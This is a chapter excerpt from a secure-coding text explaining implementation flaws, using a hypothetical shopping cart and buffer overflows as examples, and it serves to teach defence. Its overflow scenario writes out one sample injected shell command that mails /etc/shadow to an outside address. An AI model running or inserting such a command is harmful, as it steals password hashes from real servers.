Chapter 4. Implementation
An implementation flaw is a mistake made while writing the software; most, though not all, implementation flaws are coding flaws per se. In our view, implementation flaws typically arise because the programmer is either unfamiliar with secure coding techniques or unwilling to take the trouble to apply them. (No doubt because we like to believe the best in human nature, we think it's much rarer that someone tries hard and fails to successfully write secure code.) Looking back to the example of the SYN flood attacks, there were certainly implementation flaws in addition to the principal design flaw that led to the attacks. For example, when the array of TCP sockets became exhausted, some operating systems at the time simply crashed. This was the result of a memory overflow that occurred when the software attempted to store an out-of-bounds array value. At the very least, a carefully implemented TCP stack could have prevented such catastrophic failure of the operating systems. Source code is the final stage in the translation of a design into something users can use, prior to the software's being subjected to testing and (eventually) production. Flaws in source code, therefore, have a direct link to the user base; because the machine translation of the source code is exactly what gets executed by the computer at production time, there is no margin of error here. Even a superbly designed program or module can be rendered unsecure by a programmer who makes a mistake during this last crucial step. Consider a simple example of a programming error in a web-based shopping cart. Imagine that an otherwise flawlessly designed and implemented program inverts a Euro-to-dollar currency conversion algorithm, so that a person paying with Euros ends up getting a 20% discount on goods purchased. Needless to say, when the first European makes a purchase and reviews the bill, a flood of gleeful purchases from Europe will ensue. This trivialized example points out how a human mistake in the programming process—an implementation flaw—can result in serious business problems for the person or company running the flawed software. Now, let's put this into the context of a security issue. The classic example of an implementation security flaw is the buffer overflow. We discuss such flaws later in this chapter (see the sidebar Buffer Overflows), but for now, we simply provide a quick overview and look at how buffer-overflow flaws can be introduced into a software product. A buffer overflow occurs when a program accepts more input than it has allocated space for. In the types of cases that make the news, a serious vulnerability results when the program receives unchecked input data from a user (or some other data input source). The results can range from the program's crashing (usually ungracefully) to an attacker's being able to execute an arbitrary program or command on the victim's computer, invariably resulting in the attacker's attaining privileged access on the victim's computer. Thinking back to our shopping cart and Euro-to-dollar conversion example, let's consider how a buffer-overflow situation might play out in the same software. In addition to the monetary conversion flaw, the software coders that wrote this software neglected to adequately screen user input data. In this hypothetical example, the developer assumed that the maximum quantity of any single item purchased in the shopping cart would be 999—that is, 3 digits. So, in writing the code, 3 digits of input data are allocated. However, a malicious-minded user looking at the site decides to see what will happen if he enters, say, a quantity of 1025 digits. If the application doesn't properly screen this input and instead passes it to the back-end database, it is possible that either the middleware software (perhaps PHP or some other common middleware language) or the back-end database running the application will crash. Take this scenario one step further now. Our attacker has a copy of the software running in his own environment and he analyzes it quite carefully. In looking over the application code, he discovers that the buffer-overflow situation actually results in a portion of the user input field spilling into the CPU's stack and, under certain circumstances, being executed. If the attacker carefully generates an input stream that includes some chosen text—for example, #!/bin/sh Mail [email protected] < /etc/shadow—then it's possible that the command could get run on the web server computer. Not likely, you say? That's exactly how Robert T. Morris's Internet worm duped the Berkeley Unix finger daemon into running a command and copying itself to each new victim computer back in early November of 1988.
In the remainder of this chapter, we discuss ways to fight buffer overflows and other types of implementation flaws. The good news for you is that, although implementation flaws can have major adverse consequences, they are generally far easier than design flaws both to detect and to remedy. Various tools—both commercial and open source—simplify the process of testing software code for the most common flaws (including buffer overflows) before the software is deployed into production environments. The following sections list the implementation practices we recommend you use, as well as those we advise you to avoid.
|